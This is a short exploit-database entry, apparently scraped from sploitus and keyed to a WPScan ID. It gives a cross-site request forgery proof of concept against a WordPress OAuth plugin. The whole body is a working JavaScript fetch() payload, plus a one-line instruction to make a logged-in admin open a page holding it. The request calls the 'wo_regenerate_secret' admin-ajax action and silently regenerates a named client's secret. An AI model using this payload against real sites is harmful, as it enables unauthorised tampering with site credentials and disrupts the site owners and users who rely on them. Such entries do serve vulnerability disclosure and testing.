Share
## https://sploitus.com/exploit?id=WPEX-ID:E1FCDE2A-91A5-40CB-876B-884F01C80336
Make a logged in admin open a page containing the HTML code below. This will regenerate the secret for the client with ID KCzvPgkQndGfbFy34jfwoxKVCp1VzFhgSZ3PywN7

fetch('https://example.com/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wo_regenerate_secret&data=KCzvPgkQndGfbFy34jfwoxKVCp1VzFhgSZ3PywN7',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));